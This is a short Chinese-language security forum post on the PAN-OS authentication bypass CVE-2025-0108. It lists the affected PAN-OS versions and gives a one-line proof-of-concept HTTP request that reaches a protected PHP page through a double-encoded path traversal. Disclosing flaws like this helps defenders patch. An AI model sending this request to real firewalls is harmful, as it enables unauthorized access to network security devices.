Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)-网络安全论坛-网络安全-阻击者联盟

Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)

d09638adca20250416072216

Palo Alto Networks PAN-OS是美国Palo Alto Networks公司的一套为其防火墙设备开发的操作系统。

Palo Alto Networks PAN-OS存在安全漏洞,该漏洞源于存在认证绕过漏洞,会影响PAN-OS完整性和保密性。

 影响版本

1、 PAN OS 11.2 < 11.2.4-h4 

2、 PAN OS 11.1 < 11.1.6-h1 

3、 PAN OS 10.2 < 10.2.13-h3 

4、 PAN OS 10.1 < 10.1.14-h9

59b869c79e20250416072802

 

POC:

GET /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css HTTP/1.1
Host: 127.0.0.1

22644cbce220250416072609

 

请登录后发表评论

    没有回复内容